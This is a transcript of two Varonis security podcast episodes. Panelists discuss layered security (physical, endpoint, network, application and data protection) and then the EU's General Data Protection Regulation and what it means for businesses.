Kilian: I guess I’ll jump in. It is so often overlooked. We worry about firewalling the data off to protect from external attacks and stuffs that come in over the wire. But how many times in businesses do people check badges? You can walk into a corporation. If the guy sitting at the desk is distracted for a minute, and then you’re inside and nobody looks twice at you. If the doors aren’t locked in the server room, you walk in, plug in a USB device.
Basically, once you have physical access to something, it’s game over. There’s no other layer of security that they probably can’t get around at that point. And we rely so much on just kind of observing people and we put a lot of faith in locks, too, like physical key locks. They’re such a terrible false layer of security. Most front door locks or bike locks or anything else are easily defeated within seconds. The physical layer is often overlooked but it’s such a false layer of security, too, that we know we have somebody watching the door. Because again, we are relying on people and people want to be trusting.
Mike: What I was going to mention with respect of the physical layer was I think a lot of things are changing. So businesses are much more just personnel, lots more different, just physical branches, places, people working from all sorts of different remote situations, as well as it used to be everything was hard wired, and now, most every place has WiFi. And so you have this very different situation of like everyone in the office walking in with the WiFi radio that’s connected to the internet. But we don’t think about that. We just like, oh, we are on our cellphones, but if there’s malware on there that potentially perform an attack or some form of disruption.
There are some real interesting exploit tools that basically do things like DHCP exhaustion on a network and so you have to do things like MAC filtering. I worked on a high security environment on the military. They have things like if you unplug a computer from the wall from the CAT5 and plug it back in, it won’t let it back on the network as it lost the MAC connection. You can’t just bring a laptop in and plug it into the Ethernet port in the waiting room. Things like that, like very good sensible suggestions.
Cindy: I just had a paranoid thought that when I go home, I want to like install 10 locks, put on a password, and I need somehow to after-authenticate myself to get in. So in terms of a business security, like can you go overboard in terms of putting like a trillion locks on something? And then what’s kind of a good balance for an extreme paranoia or paranoid person like me?
Kilian: I’ll get dogs with bees in their mouth so when they bark, they shoot bees at you.
Mike: From a business standpoint, I think the biggest thing is actually more procedures, procedures around access to servers, access to changes, that kind of thing. And then from there, the procedures are implemented that helps with the recognition of what’s a threat and what isn’t.
On a personal level, something that I’ve been seeing a lot more in terms of physical stuff is skimmers on ATMs. That’s probably like we were talking like a personal sort of physical attack. That’s probably the big one, that every ATM you go to, you sort of want to tap at the card holder to see if it falls off because it’s so easy to put a skimmer on.
Kilian: That kind of distilled… it’s situational awareness, kind of being observant of the people and things around you, what you’re interacting with.
Cindy: Another thing we need to be alert and aware of are endpoints – protecting devices, PCs, laptops, mobile devices, from malicious softwares. People really like using endpoint protections to guard against a ransomware, and people’s found out it’s not really effective. But if it’s not ransomware, malware can really sit on your system for like six months before it’s even identified. But people also really want to protect their endpoints. What are your response and thoughts on this?
Mike: I’ll go. I guess my first thought is we’re talking about layered security, and so no solution is going to be a homerun 100% of the time. And so what we are really trying to work on is percentages, reducing the surface area we can be attacked on, reducing the opportunities for an exploit.
An endpoint security can certainly be part of that but it’s not a complete solution. But by limiting the types of apps that can be run, the type of traffic that can come in, it’s a way of helping to manage that risk.
And that’s what we’re talking about with all layers, is how can we manage risk at all this different layers? And hopefully by doing that simultaneously at all the layers, we really improve our security much more than if we thought, “Okay, it’s just endpoint security or it’s just doing training of the users.”
Kilian: The way I would think about it, too, is if you ever see the machines for like looking for gold or sifting rocks, like you have the different size of screens.
Endpoint protection antivirus, I would think, is like the biggest size of screen. It’s gonna get like the bigger rocks out, so the kind of most obvious, most basic vulnerabilities. And kind of, as you go through and sift out the different pieces, that’s exactly what it is. You can just, multiple layers, sift out different things that one might not catch until you get it.
And then just good patch management, too, on endpoints and servers, things like that. If you leave vulnerabilities that have been patched for 10 years on your system, that’s kind of inviting trouble in a lot of ways. But then people often overlook it.
Mike: Those are the big holes in your screens as your trying to through all the data and everything is falling through these unpatched systems.
Cindy: But there are a whole bunch of alerts. People get thousands of them, like daily and weekly. That’s another annoyance. You can’t actually check thousands of alerts every day.
Mike: And for all this sort of systems that monitor the things, all the vendors, us included, are trying to…people talk about alert fatigue. If you get an alert every 10 minutes, like, “Oh, something’s happening, something’s happening,” like you just cease to care about. It’s not something that actually needs responded to or thought about. So there’s a lot of work with like machine learning, better filtering, and better tracking on how to handle that to reduce that amount of alert fatigue. But you’re absolutely right, Cindy.
Cindy: And also make alerts that are really worth alerting on so that you’re not like, “Oh my God, my blood pressure is increasing,” and then you end up in the hospital or something.
Mike: What kinds of alerts are you getting?
Cindy: No, listen, it’s not me. I’m just hearing all these stories when I go to conferences and I go, “If I had that many alerts, I will just be like…ahhhhh! Watch out for the crazy woman.”
So another layer we should talk about is network security. I’m thinking firewalls, intrusion prevention, detection system, VPNs. And I was kind of tricked to read an article that says “Utility board hears about network security.” And I was like, “Oh, they’re really serious about network security.” Like, “What about the other stuff?”
So I went through and I read it. I clicked on it and I read it and they take security seriously. Like in the article, the IT director talked about network security. He made references to all those different layers that we’re talking about so far. And he made the analogy of a Swiss cheese as security and you put layers upon layers of them and said, “That even then with all the layers of cheese, a small hole, so a small hole in your security can be catastrophic.”
And I thought it was just really great that they’re talking about it. And further on in that article, it mentioned that a board member requested that presentation because he had heard about a utility at a utilities conference that there was a hacking of an electrical system in Colorado.
So we hear a lot about things that go wrong in companies and they’re not doing anything about it. But I really liked that they’re saying, “Hey, I’m protecting our utilities network.” And it’s a great way to get more of like security funding, too, because security systems are expensive, like whether it’s network. Even if it’s like a $200 thing, you still have to be like, why do you need this, and explain. So back to network security, the talk that they had, presentation they had, it’s a great way to just get money like, say, there is an article in Rob’s layered security guide about “ What’s the difference between a $1000 one and a $200 one?”
Mike: For a firewall, you’re talking about?
Cindy: For a fire…yeah. I went on a tangent. I think someone…
Kilian: I mean, you brought up an interesting point. That article, I thought, was really kind of fascinating because the one thing that kind of really, if I can pick one thing a security thing that scare me on a daily basis, it’s a lot of this, like command and control type, or not command and control but the SCADA systems or the industrial control systems that run a lot of our infrastructure.
And back to the unpatched systems, these things are from the whatever, ’80s, ’90s, that they said, “Oh, well, hey, we can monitor whatever, our damn controls online, stick it on a network with an IP address,” and then it controls kind of a vital piece of infrastructure, like something in the physical world that can cause a lot of damage. Or the controls at the electrical system, you can wipe out power and that will cause a lot of problems in the physical world.
Network security is, again, one of the critical layers. Again, if you have to connect it to a network, at least run it through something. You still need the defense and depth across the whole board, but that’s kind of the first line of defense for a kind of network connected systems.
Mike: The only other thing I was going to mention is that I think a lot of times, people think of network, especially with from a lot of employees, it’s like, “We need VPNs for very everyone. We have VPNs for everyone. We’ll be protected.” But you have to remember that also, it’s sort of like punching a hole in your firewall because VPN, it’s like making a home computer as if it was on your network, and all the ensuing issues that that can cause.
Kilian: And then we can tie it right back to physical security then. On your VPN at Starbucks, you walk away for a few minutes, someone walks up, plugs something in, or you don’t lock your laptop, then the internal network’s compromised.
Mike: I know for sure there has been multiple reports on people getting ransomware on their networks from, like someone at home and they get like an infection, they bring it to the IT group.
Like, “Oh, Bill in IT, he’ll help me out. He’s always such a nice guy.”
They bring it in.
Like, “You look at this real quick? It’s real weird.”
“All right, let’s plug it in the network.”
And, boom, the network is now infected with ransomware. Good intentions gone awry.
Cindy: Oh my God, I’m so scared that whenever you guys just share stories and I get like extra, extra scared.
Okay, the next two on application security , that, there’s a lot to talk about in that one. I wrote a blog post about it, that our IT people won’t let me install anything on my computer. When we talk about application security, it refers to the testing and doing the work to make sure apps work as they should. But there are some drawbacks to that, which is why IT won’t let me install anything, and I have to get permission. I have to tell them why. That, I understand it’s a dangerous world out there.
What are some things about application security that we need to be worried about or concerned about?
Mike: Most companies, they have a mix of things. They have a mix of applications they built in-house, third party systems that they bought off-commercial, off-the-shelves of, or cut software, and then now, sort of cloud systems. We joke about cloud doesn’t exist, It’s just other people’s computers. It’s just other people…our software are running other people’s computers or software as a service type application. There’s different considerations for each of those.
I think, across the board, one of the things to really think about for all of this is single sign-on, that the procedures for provisioning access to this and then removing it as people’s role change or as they come into or leave the company is incredibly important.
And if it is one place where that’s most often missed, it’s in those kind of things where…I use to work at a company. I won’t say the name of it.
But there phone system was separate from everything else and so that a salesperson that left, removed all their computer access, left them with their phone access, and they changed their outgoing voicemail, which for months, was just a harangue against the company, and like what blood-sucking horrible people they were and how unprofessional and incompetent. And it stayed that way for months as people called in to talk to this salesperson he was known over there.
But that can happen anywhere, with timesheets software, that can happen with reporting software, the project management software.
All of these things can exist somewhere on the spectrum. And without that single sign-on and really strict procedures, it’s very difficult to control.
Kilian: Just kind of a little bit of side, too, as we’re developing more software and it gets more complex and we expect more out of it, that just increases the chance that there’s going to be a bug and it’s a guarantee that every piece of software you run is going to have some type of issue or bug in it.
Again, especially as the citizens gets more complex and more interconnected. So it’s being cognizant of that and, again, we’ll go back to a couple of topics ago, is good patch management, making sure that the bugs are reported and then the software vendors you deal with take it seriously and patch it eventually, or soon rather than eventually.
Cindy: And the next layer on the data layer , we talk about that a lot. I think it’s the crown jewels. We want to make sure that our health data isn’t stolen, our PCI data isn’t stolen. People are really…you hear it often in every kind of podcast or show that you hear. You kind of expect data breaches to happen. People are really hurt that that’s happening. “Oh, they’re not doing enough.” But the reality is data security is tough. What are your thoughts about this layer?
Mike: We, at Varonis, we deal with structured data. Structured data, for the most part, falls under application security, so that structured data is anything that’s in the database, typically in the accesses, typically mitigated and arranged and managed through an application. I just want to make sure there isn’t direct database access somehow through the network where I exploit tools. But for the most part, that’s fairly sane.
Our niche is the unstructured world which is the files and where typically, what we see is the end results of all the structured data. So the structured data is the giant Oracle database that says like, “Yes, we should actually acquire this company,” and then the unstructured is the Powerpoint that says, “We’ll do this next Monday.” And that got out, has huge implications for stock price, and Sarbanes-Oxley, and reporting, and governance, and all these things. So there’s different risks involved with those.
Kilian: The thing about the unstructured data is that, there’s so much of it and it just grows so constantly. Every second of every day, at every business, somebody is putting some type of information out, sending an email, writing a document, editing a Powerpoint, any of this stuff. It’s just constant and that’s how businesses evolve and get better because they share information. They just keep producing and producing and producing it and it never seems to go anywhere. It’s like the internet never forgets. Well, your data center never forgets either. The project might be forgotten but it’s still out there somewhere, the Sharepoint site. All this team collaboration is over but it’s still up there and contains a lot of information. There’s some life cycle information on that.
But things like social security numbers, those never change. There might be or there is an age on credit card information, but it’s still fairly long, several years, depending on how long it’s out there. The life cycle of this data is often overlooked and you expose yourself to a lot of risk because it ends up…again, it’s created for some legitimate reason and it’s out there for some legitimate reason, but it’s forgotten about or it’s not dealt with or disposed or even secured properly.
Cindy: So to kind of wrap up, you both shared stories that I’m just like, “Oh, it’s nerve-racking,” but the overall goal is security. So we make sure we educate the people. We make sure that they don’t have access to stuff that they don’t need. We make sure they don’t get in. We make sure we protect ourselves from malware, make sure we protect our data, make sure that apps are working properly. What are some kind of wrap-up conclusions or things that I’ve missed that you want to share your thoughts on?
Mike: I think we should go back to your Swiss cheese sandwich metaphor because honestly, I think it’s actually viable because the big challenge of all this is communicating this to people who are not in our business, it’s communicating it to the executives and to the users that we need to deal with. And so we say exactly that, but it’s like stacking a lot of pieces of Swiss cheese, and the more layers we have, the fewer holes there are, the less vulnerable we are. It’s a very easy to understand metaphor. Hopefully, they are lactose intolerant. But I think that is really the case. The more layers we have and the more all these things work together, the safer we are. That’s like an old powerful thing.
Cindy : Kilian, do you have any last thoughts?
Kilian: No, I like the metaphor. I think it’s great. I have other metaphors I use for thinking about security, but the Swiss cheese one, I think, is very visually pleasing. I guess it’s something people can recognize.
Cindy: That is from the IT director in Nebraska. Like maybe he’ll listen to our podcast or join our show.
Mike: I thought we decided we’re just going to start sending packets of sliced Swiss cheese to all our customers… “Stack this together until you’re secured.”
Cindy: Make sure your bad guys don’t go in.
Cindy: So to wrap up, our parting gift, what are some things people should check out? For me, I’m pivoting to something else. Back to our show last week, we talked about the EU’s general data protection regulation. We just published on our blog an infographic. So if you do not want to read long texts, Andy and I, we created a really informative infographic describing consumer rights, as well as obligations companies have to the consumers. So head over to our blog and check it out.
Mike, do you have any parting gifts for our listeners and viewers?
Mike: I was going to recommend; I was going to say I just looked at the infographics you’re talking about. It’s at blog.varonis.com, and I think it really is great. And we’re talking about educating other people, it is the perfect thing, that if you are an IT, to send to an executive or to send to some stakeholder on your company to try to get help get their minds in the right place for dealing with the new regulations.
My suggestion for a parting gift was going to be a game, actually.
It’s called Hack Net. It’s probably one of the few games you could get expense by your company. It looks so much like one of those, like in the movies when they’re like hacking into a system and it has everything scrolling and doing stuff. So it’s the simulation of that but it covers actual exploits, the concepts of how they are exploited, what is done. So it’s very educational but super fun to run through and has a little scenario and you actually hack into all these different systems.
It’s called Hack Net. And right now, it’s $10. But I mentioned it last week, during this…summer sale, I think we’re going $5. But it’s very cool and interesting. And if you’re interested in this as a general topic, I know we have a lot of people on the IT side and not necessarily like security pentesting side, it’s a great way to really like deeply understand all those concepts. So, cool, check it out.
Cindy: Cool, thanks. Kilian, do you have a parting gift?
Kilian: Actually, what Mike was saying just reminded me of something. The other week, I was in Uber. I was taking a ride to the airport or train station or somewhere, and on the screen, they popped up a little thing like, “Hey, code while you go,” or something like that. And they gave you like little snippets of code and they wanted you to find the error in the code. And I thought it was a really, you know, crowdsourcing something, information, maybe for a potential job offer. But I just thought it was really interesting they were kind of doing this little application security type of initiative within the app itself like while you’re on the trip. I don’t know if the pops are for everybody but I saw it. I thought it was interesting to look at while I was on my ride.
Mike: Are you saying you got a job offer from Uber? You’re leaving Varonis? You figured it out?
Kilian: The next time you’ll see me with my dash cam and my car driving around.
Mike: Oh, man…
Cindy: Kilian might be doing both. He might be driving and working at Varonis. You never know because you know he’s fake.
Thanks so much, Mike and Kilian, and all our listeners and viewers for joining us today.
If you want to follow us on twitter and see what we’re doing or tell us who’s most fake on the show, you can find us @varonis, V-A-R-O-N-I-S.
And if you want to subscribe to this podcast, you can go to iTunes and search for The Inside Out Security Show.
There is a video version of this on Youtube that you can subscribe to on the Varonis channel. So thanks, and we’ll see you again next week.
Mike: Thanks, Cindy.
Kilian: Thanks, Cindy.
Cindy: Thanks, Mike. Thanks, Kilian.
Join us Thursdays at 1:30ET for the Live show on Youtube, or use one of the links below to add us to your favorite podcasting app.
The post Layered Security – IOSS 14 appeared first on Varonis Blog.
We’ve been writing about the GDPR for the past few months now and with the GDPR recently passed into law, we thought it was worth bringing together a panel to discuss its implications.
In this episode of the Inside Out Security Show, we discuss how the GDPR will impact businesses, Brexit, first steps you should take in order to protect EU consumer data and much more.
Go from beginning to end, or feel free to bounce around.
Cindy: Hi and welcome to another edition of the Inside Out Security show. I’m Cindy Ng, a writer for Varonis’s Inside Out Security blog. And as always, I’m joined by security experts Mike Buckbee, Rob Sobers, and Kilian Englert. Hey, Kilian.
Kilian: Hi Cindy.
Cindy: Hey Rob.
Rob: Hey Cindy, how is it going?
Cindy: Good. And hey, Mike.
Mike: Hey Cindy, you made me go last this week. That’s all right.
Cindy: This week, we also have two special guests, also security experts. Andy Green, who is based in New York, and Dietrich Benjies who is based in the UK. And they’re here to join us to share their insights on the latest General Data Protection Regulation that was just passed with an aim to protect consumer data that will impact not only businesses in the EU, Britain and the US and the rest of the world. So Hi Andy.
Andy: Hey Cindy.
Cindy : Hey Dietrich.
Dietrich: Hi Cindy.
Cindy: So, let’s start with the facts. First, what is GDPR and what are its goals?
Andy: In one sentence? Can I get two?
Cindy: You get two and a half.
Andy: Okay, two and a half.
So it stands for General Data Protection Regulation. It’s a successor to the EU’s current data security directive which is called the Data Protection Directive, DPD. And it really…I mean if you are under the rules now, the GDPR will not be a major change but it does add a few key major additions. And one of those is…well there is a stronger rules on, let’s say right to access your data. You really have … almost like a bill of rights.
One of them is that you can see your data, which is maybe not something in the US we are experienced with.
Also, another new thing is you have a right of portability, which is something that Facebook probably hates. In other words, you can download the [personal] data. If I were, I assume this would happen in the UK or the EU, that if you are a Facebook customer you will be able to download everything that Facebook has and have it in some sort of portable format.
And I guess that [if you have another] social media service, you can then upload that data to that social media service and say goodbye to Facebook, which is kind of not something they’re very happy about.
… You have almost like a consumer data rights under the new rule. I don’t know if anyone has any comments on some of these things but I think that’s…that, I think, is like a big deal.
Dietrich: I’m sorry Mike. Were you going to go next? I chimed in so I suppose I’ll carry on-
Cindy: Go ahead, Dietrich.
Dietrich: So I think in terms of your attendance, it’s the European Union recognizing that data is…the European citizens recognize their data as important and historically, recently and historically, there has been many cases where it hasn’t been demonstrated to be appropriately controlled.
And as it’s a commodity, the information on them is a commodity traded on the open market to a degree that there has just been an increasing demand to have greater safeguards on their data. And those greater safeguards on European citizen data gives them greater confidence in the market, in the electronic market that the world economic market has become.
So that the two pillars, which we’ll get to, or the two tenants are Privacy by Design and accountability by design … we’ll get to a lot of things but that’s synopsis on it.
Mike: I was curious about to what extent this was targeting enterprises or is it targeting, say like you brought up Facebook, which I consider an application, like a web application service. Was there an intent behind this, that it’s targeting more one or the other?
Andy: Yeah. It’s definitely, I would say consumers. I mean it’s really very consumer-oriented.
Dietrich: Mike do you mean in terms of it’s targeting the consumers? Yes, it’s consumer data. It’s related to but do you mean in terms of the types of businesses where it’s most applicable? Is that what you mean Mike?
Mike: Well, you know, there is a decision-making framework that, so now with GDPR as the Data protection Directive to need to make decisions, that I’m building an application, I’m going to need to have new privacy features. We talked about Privacy by Design which has its own sort of tenets. Or I’m building out the policies for my company which has satellite offices all over the world and some of them happen to be in the EU. Just trying to look at the impact and look at how this should change my decision making on the business.
Dietrich: Well, it’d be cynical. I’d say if you want to avoid it totally and entirely, just don’t sell to an EU citizen.
Rob: Yeah, I think, to answer your question, Mike, the Facebooks of the world and these global web services are going to have to worry about it if they are collecting data. And we all know Facebook not only collects the data that you give them but it also ascertains data through your actions.
And I think that’s what Andy was talking about is that it’s not just the ability to click a button and say give me my profile data back now so I can take it with me. It’s like I put that data in but I think what the GDPR is aiming to do is give you back the data that they’ve gathered on you from other sources. So tell me everything you know about me because I want to know what you know about me. And that’s, I think, a very important thing. And I really hope that the US goes in that direction.
But outside of those web services, think about like any bank that serves an EU customer. So any bank, any healthcare organization, so other businesses outside of these big global web services certainly do have to worry about it, especially if you look in your customer database or any kind of…if you are a retailer, your transaction database, and you have information that belongs to EU citizens then this is something that you should at least be thinking through.
Cindy: So who needs to really pay close attention to the law so that you are executing all the requirements properly?
Dietrich: Who needs to pay attention to it in terms of those organizations and scope? It’s pretty well spelled out that the organizations who deal with, who transfer, who process big things on processing and doing this information associated to European citizens.
So if I backtrack a bit, it was where we are starting with the portability of the data, the information that we have, that organizations have on individuals and those subject access request, right to erasure, kind of the first and foremost is the protection element. Making sure that the data is protected, that we are not…organizations aren’t putting us at risk by the fact that they are holding our data and making that overexposed.
Kilian: To kind of address the question more technically speaking, I think … everybody involved in the process needs to pay attention to it. From the people designing the app, Mike, if you want to launch your business, you need to realize that there are…boundaries are kind of made up anymore with technology.
So right from the beginning, we’ll talk about Privacy by Design. But that needs to be the first step, all the way up to the CEO of the company or the board realizing that this is a global marketplace. So they want to get the most amount of customers, so they have to take it seriously.
Andy: Yeah, I was going to say that they do have a heart at the EU … and they do make an exception … there is some language for making exceptions for smaller businesses or businesses that are not sort of collecting data on, what they say, like on a really large scale–whatever that means!
What you are saying is all true but I think they do say that they will sort of scale some of the interpretations for smaller businesses so the enforcement is not as rough. And there may even be an exclusion, I forget, for under 250 employee companies.
But I think you are right. This is really meant for the, especially with the fines, it’s really meant to get to C-Level and higher executive’s attention.
Cindy: So if you are a higher up or someone responsible for implementing GDPR, what’s the first step you need to look for and so you don’t miss any deadlines, so that you are planning ahead?
Andy: I think we had to talk about this the other day. I’ve actually talked about it with Dietrich. Some of this is really, I’d say, like common IT sense and that if you are following any kind of IT best practices and there are a bunch of them or some standards, you are probably like 60 or 70% there, I think.
I mean if you are, let’s say you are handling credit card transactions and you are trying to deal with PCI DSS or you are following some of the– forget what they call — the SANS Top 20 … So maybe I’ll say it’s sort of like putting laws around some common sense ideas. But I realize the executives don’t see it that way.
Kilian: Yeah. I think the first thing you have to do is figure out if you have that data, to begin with, or where it’s at. I mean the common knowledge is you probably do. If you do some type of commerce or interact with anybody really, you are going to store some information. But kind of nailing it down where it’s at or where it might be is I think the key first step.
Dietrich: And in terms of deadlines, I suppose to answer your question very directly, the deadline is May 25th, 2018, is when it comes into full force. That is the, I wouldn’t say it’s fast approaching. We still have 23 months.
…
Dietrich: I’ve got a clock on my laptop right there. Deadline to GDPR.
Cindy: So there is also a data breach notification. What does that process entail? Like how do you get fined and how do you know that personal data has been lost or breached? What’s defined as personal data? Because there is a difference between leaking like company ID, company IP versus leaking personal data.
Andy: Actually I happen to have the definition right in front of me. So it’s any information related to a person. And in particular, it can be…so it says an “identifiable person is one who can be identified directly or indirectly in particular by reference to an identifier such as a name, an identification number, location data, or an online identifier”.
So it’s really, I guess what we would call in the US, PII [personally identifiable information], but it’s broad. It’s not just a strict list of social security number or specific account numbers. Those are examples of the types of identifiers. So it’s very broad but it has to relate back to a person and they do consider the online identifiers as “relatable to a person”.
Cindy: And kind of I can’t help but ask Dietrich, will Brexiters be exempt from GDPR?
Dietrich: No. Not at all.
So, first off, yes. A week ago today, we cast our votes. And then a week ago tomorrow it was found out that yes, in fact, we are leaving the European Union. So the reality of that is we haven’t invoked article 50. So article 50 is that yes, we are definitely doing it. We are doing it and then we have 24 months for them to get the heck out of the European Union.
The starting of that clock isn’t likely to happen for some time. For one David Cameron, who is currently our prime minister is stepping down…has stepped down. We have to wait. He said, “I’m not going to invoke. I’m going to let somebody else handle not only that process of invoking article 50 but in addition to that, negotiating the trade policies and all the things associated with the exit.”
In addition to all the things associated with the exit is the adoption or exclusion of a lot of the European directives, GDPR being one. So we could just sit there and not only, so if you take that time scale that will come into play if article 50, and there is some questions on the legality of the referendum, which I won’t go into in detail but there is a lot of debate going on in the moment that we voted leave if it’s actually something that will happen.
If it happens, and let’s say it will, the time scale of that activity is likely to be well after GDPR is in effect. And if GDPR does come…sorry, and even if we leave and the likelihood as in democratic country in which we live, we have cast a vote that we will leave, we could still take on GDPR as our own.
We have our own Data Protection Act here in the UK. We could just bump it up with GDPR at a stroke of a pen. And that’s quite likely considering we are debating in negotiation. We will negotiate for, hopefully, as freer trade as we can do within the European Union and I’m sure that will be…it would make sense that that would be a dependent clause.
Andy: And I was going to say, it looks like if you’re…since the UK has to trade with the EU, the EU countries are going to put in higher standards for e-commerce transactions.
Dietrich: Yeah. They are out biggest trading partner. I believe and don’t quote me on this but I could be wrong. I think it’s 54, 54% of our exports go to the EU. And likewise, we are one of the biggest trading partners for France, for Germany, etc.
Cindy: So, the US, we trade with the EU and the…
Dietrich: Do you? (sarcasm)
Cindy: I’m really talking about territorial scope. And I’m curious if I start a business or Mike starts a business, we talked about this earlier, how will I…what’s the law in terms of me needing to protect an EU consumer’s personal data? That’s a little controversial. Go ahead Dietrich.
Dietrich: Can I give you some examples on this?
In the last 48 hours, I have purchased a flight from Southwest Airlines, United Airlines, I’m a European citizen. I have purchased a backpack from some random site that’s being shipped to my father.
Look, I hope I’m not debt dipping myself in tax loss but anyway, you know what I mean. As a European citizen, I’m going to be in the States for three weeks as of next week. So I’m a European citizen who is going to be transacting, who is going to be purchasing stuff over there. So, considering the freedom of movement that exists, the small world in which we live where European citizens regularly travel to the US, regularly buy from sites online, I can’t see how the border is going to make any difference.
Most, if not, I’d say the vast majority of organizations in the US will deal with European citizens and therefore at least for that subset of data related to European citizens, they will be…they’ll have to put in controls if they want to carry on trading with European citizens.
Cindy: Go ahead, Mike.
Mike: Well, I was trying to think of parallels to this. And there is one that I think a lot of people are aware of which is like the Cookie Law which is, there were some European directives around like you should have, like if you land on a website, sometimes you see those banners at the bottom that says this website uses cookies and then click to, which came out of a similar thing. That’s really only been European websites that are doing that, but that sort of a half step into this. I just wonder if that shows a model for how this is going to be adopted so that it’s only the very strictly EU sites.
Andy: Yeah. I think that was, that came out of, I forget, it may have been the Data Protection Directive but you’ve got to gain consent from the consumer and they apply it to cookies, accepting cookies. So you do see that on a lot of the EU sites, that’s right.
Mike: It just seems very odd because there is no…it doesn’t seem like it will improve things. It just seems like, yeah, we are getting cookies off you so here is this giant banner that gets in the way.
Andy: Will they ever click no?
Mike: Well, what’s interesting is that I don’t think I’ve ever actually seen like, “Yeah, no, don’t collect my cookies.” It just says like, “Hey, we are doing this so accept it or leave.” You are on my website now, so probably with a French accent.
Cindy: So in terms of, we talked about the cookie law, we’re talking about the GDPR.
If you are a CEO and you know that there is a potential risk of anything really, and let’s say data breach, if something happens, they’re often asking, “okay, higher ups, can we work through this? Will our companies survive?”
It sounds like people don’t like to be strong-armed into following certain laws. Like if I’m an entrepreneur, I’m going to come up with an idea. And the last thing I would want is like, oh, I have to follow privacy by design. It’s annoying.
Rob: Yeah. I mean it’s a push and pull between innovation and security. You see this with all sorts of things. You know, Snapchat is famous for its explosive growth, hundreds of millions of active users a day. And in the beginning, they didn’t pay attention to security and privacy. They kind of consciously put that on the back burner because they knew it would slow their growth.
And it wouldn’t have mattered as much if they never became a giant company like they are today. But then it came back to bite them, like they’ve had multiple situations where they’ve had data breaches that they’ve had to deal with and I’m sure devote a lot of resources to recovering from, not only on the technical side of things but also on the legal and PR side. So it is a push and pull but we see it in varying degrees everywhere.
Look what Uber is doing as they expand into different markets and they have to deal with all of the individual regulations in each state that they expand to, each country. And they would love to just close a blind eye and focus on improving their technology and recruiting new drivers and making their businesses a success.
But the fact of the matter is — and the EU is way out in front of everybody else on this — is that somebody has to look out for the customers. Because we just see it over and over again where in the US, it’s almost like flipping. Like we see these massive breaches where people’s healthcare information is exposed on the public web or their credit card numbers get leaked or God knows what kind of information. And it just doesn’t ever feel like there is enough teeth to make organizations really assess their situation.
Like every time I apply– and I don’t do this very often, thank God!–apply for a mortgage in the US, the process, it scares me. You have to email sensitive information to your mortgage broker in plain text. They are asking for PDFs, scans of your bank account. And where that information goes, you’re just not that confident in a lot of these companies that they are actually looking at information and putting it in sensitive secure depositories, monitoring who has access to it. It’s just…without this regulation, it would be…without regulations like GDPr, it would be way worse and there would be no one looking after us.
Kilian: You actually kind of beat me to the point I was going to make there Rob by couple of sentences. But, you know, fine. The businesses don’t like being strong-armed but the consumers don’t like having their entire lives aired out on the Internet.
And I think you are 100% right there. It is a pain in the butt in some cases for innovation, but we keep going back to it or I will but Privacy by Design. You don’t have to make an and/or decision. If you start with that mind to begin with you can achieve both things. You can still achieve massive growth and avoid some of the problems instead of trying to patch up the holes later on.
Dietrich: One thing in terms of the strong arm, in terms of the regulatory fatigue that organizations get, I have been dealing with organizations for some time and it seems that regulations are at points that the external world makes organizations focus on the only things they will focus on.
And this is important. It’s important for us. I mean I kind of like…I don’t kind of like. I quite like the intent of the regulation. It’s down to protect me. It’s not something that’s esoteric. It’s something that’s quite explicit to protect more information. And if it requires a regulation for them to take heed and pay note and to get over the fact that regardless if they have been ignoring data breaches in the past, to do so in the future may cost them more than it had, then that’s probably a good thing.
Andy: I was just going to say that one of the, like the one word they use in a lot of the law is just it has to do with Privacy by Design. It’s just minimize. I think if you just show that you’re aware of what you are collecting and trying to minimize it and minimizing what you collect, put a time limit on the data that you do collect, the personal data, in other words, if you’ve collected it and processed it and you no longer have a need for it, then get rid of it.
It seems common sense and I think they want the companies to be thinking along these lines of, as I say, just minimize. And that shouldn’t be too much of a burden, I think. I don’t know. I mean I think as Rob was saying, some of these web companies are just going crazy, collecting everything, and it comes out to sort of bite them in the end.
Mike: And this is me being cynical but I wonder if this is going to be a new attack vector. If there is like an easy way to get all your information out of Facebook, then that’s the attack vector and you just steal everyone’s information through the export feature.
I don’t know if anyone else saw there is a thing that you could hijack someone’s Facebook account by sending in a faxed version of your passport. That was a means by which they would reset your password if you couldn’t do anything else and you lost access to it. They are like, “Well, this whole rigamarole, but fax in your passport,” and so people were doing that as a…I think its good intentions. I just wonder about the actual implementation, like how much of a difference it will actually make.
Rob: Yeah, and I think you are right Mike that the execution is everything in this. With these regulations, we see it with failing PCI audits. PCI auditors that are checking boxes. And having worked for a software company that, in a previous job, that did retail software and was heavily dependent on collecting credit card information from certain devices and terminals and keyboard swipes and all sorts of things and gone through a PCI audit, knowing that there were holes that weren’t done by the auditors, it’s all about the execution. It’s all about following through on best practices for data security. And the regulation itself isn’t going to make you excellent at security.
Cindy: So if I’m trying to catch up… in terms… if I am not following PCI or if I am not following the SANS top 20, which is now renamed to something else like Critical Security Controls… so what are some of the things that I can start with in terms of protecting my customers’ data? Any tips?
Rob: Well I mean one thing and Andy kind of touched on this is don’t collect it if you don’t have to. I think that’s the number one thing. I mean certain services out there actually make it easy for you not to touch your customers’ data. For instance, Stripe, which is a pretty popular payment provider now, if you are collecting payment information on the web from customers, you should never know their credit card number. It should never hit your servers. If you’re using something that Stripe, it basically goes from the web form, off to Stripe and you get at most the last four digits and maybe the expiration number. But as a business, you never have to worry about that part of their profile, that sensitive data.
So to me, start with asking that question of what do we actually have to have. And if we don’t need it, get rid of it and let’s look at all of our data collection processes, whether it’s by paper form or web form or API, whatever the method is and decide what can we ax to just cut out the fat. Like we don’t want to have to hold your information if we don’t have to. Now, failing that, I know a lot of companies cannot do that, like Facebook’s business is knowing everything about everybody and the connections. And so in that situation, it’s a little bit different.
Cindy: It’s hard because what if I’m a company and I just what if I’m a hoarder? Like I hoard my…I live in New York, my studio is tiny, what if I like to hoard?
And it’s kind of like you are digitally hoarding stuff. And …. storage is cheap, why not get more? What would you say to a digital hoarder in terms of I might need this information later?
Rob: I would say stop. Stop doing that! There are data retention policies that prevent you from doing that that you can implement. It’s an organization culture thing, I think. Some organizations are great at data retention, others are hoarders. It’s just bad data protection.
Dietrich: Greater data retention and hoarders. We’d love to retain data. Most of the organizations we’ve talked to love to retain data. It’s nice having something to get in that stick which sits there and goes, just get rid of it. I talk to organizations now and I’ll go finally this is being implemented in such a way that we actually can go back to the business. Who doesn’t want the data deleted? It’s usually people in the business who says I may, at some time in the future, need that document that I created 15 years ago. Well not if it has anything related to an individual associated with it.
